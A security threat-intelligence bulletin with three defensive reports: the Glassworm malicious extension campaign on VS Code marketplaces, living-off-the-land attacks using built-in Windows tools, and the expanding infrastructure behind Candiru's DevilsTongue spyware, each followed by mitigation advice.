Update: Glassworm Campaign Escalates Across Developer Extension Ecosystems
Glassworm has advanced into a broader, more aggressive phase, with adversaries planting two dozen new malicious extensions on the Microsoft Visual Studio Marketplace and OpenVSX. These platforms distribute critical tooling for VS Code–compatible editors, which positions them as high-value entry points for infiltrating development environments. The threat actors rely on invisible Unicode characters to conceal harmful logic during initial review, enabling their uploads to pass standard validation. Once active on a workstation, the malware attempts to harvest credentials from GitHub, npm, and OpenVSX, while also probing data from dozens of widely used extensions and targeting cryptocurrency wallet information. Additional components configure a SOCKS proxy on the victim's device to relay outbound operations and deploy an HVNC module that grants remote, covert control. Although both marketplaces removed the first wave and rotated compromised access tokens, the operators quickly returned with new publisher accounts and revised extension sets that restored the threat. Secure Annex's recent findings show that the third wave imitates trusted tooling across multiple development ecosystems, creating convincing stand-ins for popular frameworks, UI components, and coding utilities. The attackers initially submit non-malicious versions to gain approval, then push harmful updates once the extension is listed, ensuring minimal scrutiny. They further inflate download numbers to elevate placement in search results, causing their extensions to appear adjacent to well-known projects and increasing the probability of installation by unsuspecting developers. The latest builds incorporate Rust-based payloads, demonstrating a clear investment in durability and cross-platform execution. Some variants continue to rely on Unicode manipulation to obscure key functions, reinforcing the campaign's focus on evasion. Ongoing monitoring has identified additional fraudulent packages in both repositories, underscoring the operators' persistence and adaptability. Organizations should enforce strict extension-installation policies, verify publisher authenticity, and block or remove any items connected to the Glassworm identifiers until both marketplaces confirm full containment.
Living-Off-the-Land Techniques Enable Adversaries to Evade Enterprise Security
Researchers report a clear shift away from traditional offensive tooling, as threat actors now favor built-in Windows utilities to operate within networks without triggering alarms. Living Off the Land relies entirely on legitimate Microsoft-signed components already present on every system, allowing malicious activity to blend seamlessly with normal administrative work. Tools, including PowerShell, WMI, certutil[.]exe, and native scheduling mechanisms, enable attackers to perform reconnaissance, execute commands remotely, download payloads, and maintain persistence while avoiding signature-based detection. Because these utilities are trusted and often essential for daily operations, defenders face a difficult balancing act between restricting them and disrupting mission-critical workflows. This creates a structural advantage for attackers who can run the same commands administrators use, leaving almost no distinguishing markers for traditional EDR tools to analyze. Investigations show that native tools are being pushed to their limits for credential theft, lateral movement, remote execution, and configuration tampering, all without dropping custom malware. PowerShell remains a primary vector for reconnaissance and credential access, while WMI enables fileless remote operations that never touch disk. These tactics overwhelm legacy monitoring approaches that rely on file signatures or simple process alerts, forcing defenders to adopt deeper visibility into execution patterns. Organizations are increasingly encouraged to enhance logging, track command-line activity, monitor WMI operations, deploy Sysmon for richer telemetry, and apply strict allowlisting paired with MFA and segmentation. The path forward requires moving past traditional detection models and embracing behavioral analytics, continuous threat hunting, and a stronger focus on identifying unusual administrative behavior across the network. Strengthen visibility into native tool activity, enforce tighter operational controls, and prioritize behavior-driven detection practices to counter fileless attacker techniques.
Expanding DevilsTongue Operations Increase Risk to Windows Environments
Recent findings from Insikt Group indicate a notable expansion of Candiru's operational infrastructure, reinforcing the threat it poses to Windows systems worldwide. The spyware vendor, known for developing the advanced Windows-targeting malware DevilsTongue, now operates across eight identified infrastructure clusters, with at least five still active. These clusters, tied to operators in regions including Hungary, Saudi Arabia, and Indonesia, demonstrate varied technical designs, ranging from direct management of victim-facing servers to the use of multilayered proxies and Tor-based routing to conceal command-and-control activity. DevilsTongue is engineered for deep system infiltration on Windows devices, enabling theft of browser data, system files, authentication material, and even content from encrypted messaging platforms. While historically deployed against political and civil-society targets, the malware's capabilities, cost structure, and broad global use mean that any individual or organization handling sensitive information faces elevated exposure if targeted through travel, cross-border partnerships, high-value negotiations, or supply-chain activity. Candiru's persistence, despite sanctions and regulatory pressure, amplifies concern for U.S. enterprises operating Windows-heavy environments. The company has repeatedly shifted corporate identities to maintain operational continuity and has demonstrated resilience amid years of global efforts by governments and security researchers to disrupt its operations. Past reporting has confirmed infections linked to browser zero-day exploits, malicious document delivery, and modern ad-distribution networks, methods that can reach targets regardless of geography or political relevance. The rise of commercial spyware vendors has created an ecosystem in which advanced intrusion capabilities once limited to intelligence services are now accessible to foreign government clients with varying oversight practices. U.S. organizations should enhance security baselines for all Windows devices, enable deep telemetry collection, implement targeted threat-hunting for spyware indicators, and enforce strict separation between personal and corporate technologies. Executive travelers and personnel involved in sensitive operational areas should receive elevated security controls and pre-travel risk briefings. Continuous monitoring and broader organizational awareness remain essential as commercial spyware ecosystems grow more capable and more globally distributed.
